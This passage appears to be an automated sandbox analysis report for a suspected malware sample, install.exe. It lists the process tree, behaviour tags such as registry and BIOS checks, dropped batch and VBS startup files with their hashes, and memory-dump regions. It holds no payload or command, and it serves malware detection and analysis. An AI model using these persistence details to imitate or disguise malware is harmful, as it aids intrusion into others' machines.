C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD555d32bc1c206428fe659912b361362de
SHA17056271e5cf73b03bafc4e616a0bc5a4cffc810f
SHA25637bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff
SHA5122602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5c14ba4937deac7a8398a50870dd1f823
SHA1a69e7e448049bb511c506eb20f7050591c6ea430
SHA25636d2e45661b988d454ff00875bc167bdc2b82e0bc95e20617d5b8de26c548e69
SHA51219346496694d9063ff17b4a35b078803c3922dd0b51bba162ee1079f0cbc6a29641e079d52e4c2bb2f61bf7de1f09993b274b209c12a7e91c68932c423b68644
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD5a3c9c6c1c80047e98b4ec1d3058230d4
SHA1f3b064e274a2f57c200c334d9cfc835f30e94cf6
SHA2565b72fa2570f06220d7c76ee8341f0db7e591a0312ba01a1e4065a29a0459bcee
SHA512e610047300a3665f212a6c28a812d303b2befab2002428c45ab340e47b843196c3e68bdac84ec1d81410bcfd0e74572105b00f9945bee6f71a75f63dda892192
-
C:\Users\Admin\AppData\Local\Temp\GiEdDy5BEy2A.batFilesize
276B
MD50cff3faf9654712d7103ff06d82d6fa7
SHA1667a8ab31576b48d8924e2a671b50da76b3d8b9a
SHA2562b41616bb002455e3f8163df830fb5b5d54385ae2218c7fc59cf1db8b1df7ec5
SHA5127bd739fabf7a24475d441e933f8eb7cbc11f80e96ca5b2ba9d9e1f893479cb4c4eb97e58c8b4514b94c570757fd208cbefac35c7f97446cb05343c744c9c45af
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_03w4sg40.ggc.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1Filesize
224B
MD50e73098a624cd051c9eee281c378f546
SHA1f28ade4d1aa83b3bde7bc7de5dd87da2edbfc92a
SHA256894de261e7b3e93c4d667e5229d5c2d0656673764b9f2cb891b1959b8a6d6952
SHA5123f131cae927a4c47c009e9b921b2c8dc4b3609ecc5fe91d2602c0f251769bd0aa12ee803e5e2b64196e4e97aa84ad5dad09776ac487c25360831ab6d88c165d3
-
C:\Users\Admin\AppData\Roaming\startup_str_61.batFilesize
513KB
MD52f2f86a8f6be8fa6b37bd49bcd660a75
SHA1f7006941a8cbf7a663e9fa379f75ccd5afedd730
SHA2563798ed2ce7d93b63c0e5670d610809c6b73ddf556968b58446ae8b62c027354c
SHA5125f253dd977ff725bab54ddd45bcdbd213587b55a376446a9db2c68bc097e97ad7a61019156449f65e329b9b51f8de3dfa077aa093787fc037d1c5c92252334fb
-
C:\Users\Admin\AppData\Roaming\startup_str_61.vbsFilesize
114B
MD58db4b5993483a064a1e575367492ac74
SHA1541577e0251a174865267f1e44f472efe6d46928
SHA256f7413a7fd1f5e3e6aa91f4e8d79933bcd1ccbfe499f2d3aad755e6ebe71db634
SHA512f6fc1c38ea77857dd8d3788e4da882582c828deca531c8ad2cda420f103bca2caefbd64d05ebea4b275a59fb2518abd39bf339b95bfbe468c27c544c5061c236
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
memory/380-150-0x00000217299B0000-0x00000217299DB000-memory.dmpFilesize
172KB
-
memory/380-156-0x00000217299B0000-0x00000217299DB000-memory.dmpFilesize
172KB
-
memory/380-157-0x00007FF8B9FD0000-0x00007FF8B9FE0000-memory.dmpFilesize
64KB
-
memory/392-161-0x000002226DD30000-0x000002226DD5B000-memory.dmpFilesize
172KB
-
memory/620-123-0x0000019DDF0E0000-0x0000019DDF10B000-memory.dmpFilesize
172KB
-
memory/620-117-0x0000019DDF0E0000-0x0000019DDF10B000-memory.dmpFilesize
172KB
-
memory/620-116-0x0000019DDF0E0000-0x0000019DDF10B000-memory.dmpFilesize
172KB
-
memory/620-115-0x0000019DDED10000-0x0000019DDED35000-memory.dmpFilesize
148KB
-
memory/620-124-0x00007FF8B9FD0000-0x00007FF8B9FE0000-memory.dmpFilesize
64KB
-
memory/676-128-0x000001C044200000-0x000001C04422B000-memory.dmpFilesize
172KB
-
memory/676-134-0x000001C044200000-0x000001C04422B000-memory.dmpFilesize
172KB
-
memory/676-135-0x00007FF8B9FD0000-0x00007FF8B9FE0000-memory.dmpFilesize
64KB
-
memory/820-34-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/820-50-0x0000000006670000-0x000000000668E000-memory.dmpFilesize
120KB
-
memory/820-59-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/820-55-0x00000000075F0000-0x0000000007601000-memory.dmpFilesize
68KB
-
memory/820-54-0x0000000007670000-0x0000000007706000-memory.dmpFilesize
600KB
-
memory/820-53-0x0000000007460000-0x000000000746A000-memory.dmpFilesize
40KB
-
memory/820-52-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/820-56-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/820-39-0x00000000709D0000-0x0000000070A1C000-memory.dmpFilesize
304KB
-
memory/820-49-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/820-38-0x0000000006690000-0x00000000066C2000-memory.dmpFilesize
200KB
-
memory/820-27-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/820-26-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/820-51-0x00000000072A0000-0x0000000007343000-memory.dmpFilesize
652KB
-
memory/964-139-0x000001D537FA0000-0x000001D537FCB000-memory.dmpFilesize
172KB
-
memory/964-145-0x000001D537FA0000-0x000001D537FCB000-memory.dmpFilesize
172KB
-
memory/964-146-0x00007FF8B9FD0000-0x00007FF8B9FE0000-memory.dmpFilesize
64KB
-
memory/1044-83-0x0000000007A10000-0x0000000007A1A000-memory.dmpFilesize
40KB
-
memory/1044-82-0x00000000078F0000-0x000000000792C000-memory.dmpFilesize
240KB
-
memory/1044-81-0x0000000004FA0000-0x0000000004FB2000-memory.dmpFilesize
72KB
-
memory/1044-80-0x0000000007650000-0x00000000076E2000-memory.dmpFilesize
584KB
-
memory/1044-79-0x0000000007530000-0x000000000759C000-memory.dmpFilesize
432KB
-
memory/3240-99-0x00000289EF140000-0x00000289EF16A000-memory.dmpFilesize
168KB
-
memory/3240-101-0x00007FF8F9A30000-0x00007FF8F9AEE000-memory.dmpFilesize
760KB
-
memory/3240-100-0x00007FF8F9F50000-0x00007FF8FA145000-memory.dmpFilesize
2.0MB
-
memory/3240-89-0x00000289ECD10000-0x00000289ECD32000-memory.dmpFilesize
136KB
-
memory/3732-22-0x0000000002700000-0x0000000002708000-memory.dmpFilesize
32KB
-
memory/3732-20-0x00000000075C0000-0x0000000007C3A000-memory.dmpFilesize
6.5MB
-
memory/3732-1-0x0000000004840000-0x0000000004876000-memory.dmpFilesize
216KB
-
memory/3732-2-0x0000000004FC0000-0x00000000055E8000-memory.dmpFilesize
6.2MB
-
memory/3732-0-0x0000000074BBE000-0x0000000074BBF000-memory.dmpFilesize
4KB
-
memory/3732-3-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/3732-4-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/3732-24-0x0000000008C40000-0x00000000091E4000-memory.dmpFilesize
5.6MB
-
memory/3732-5-0x0000000004F90000-0x0000000004FB2000-memory.dmpFilesize
136KB
-
memory/3732-6-0x0000000005720000-0x0000000005786000-memory.dmpFilesize
408KB
-
memory/3732-23-0x0000000006F40000-0x0000000006FA2000-memory.dmpFilesize
392KB
-
memory/3732-7-0x0000000005790000-0x00000000057F6000-memory.dmpFilesize
408KB
-
memory/3732-21-0x00000000062E0000-0x00000000062FA000-memory.dmpFilesize
104KB
-
memory/3732-17-0x0000000005810000-0x0000000005B64000-memory.dmpFilesize
3.3MB
-
memory/3732-78-0x0000000074BB0000-0x0000000075360000-memory.dmpFilesize
7.7MB
-
memory/3732-19-0x0000000005D60000-0x0000000005DAC000-memory.dmpFilesize
304KB
-
memory/3732-18-0x0000000005D20000-0x0000000005D3E000-memory.dmpFilesize
120KB
-
memory/4340-112-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4340-102-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4340-105-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4340-104-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4340-103-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4340-109-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4340-111-0x00007FF8F9A30000-0x00007FF8F9AEE000-memory.dmpFilesize
760KB
-
memory/4340-110-0x00007FF8F9F50000-0x00007FF8FA145000-memory.dmpFilesize
2.0MB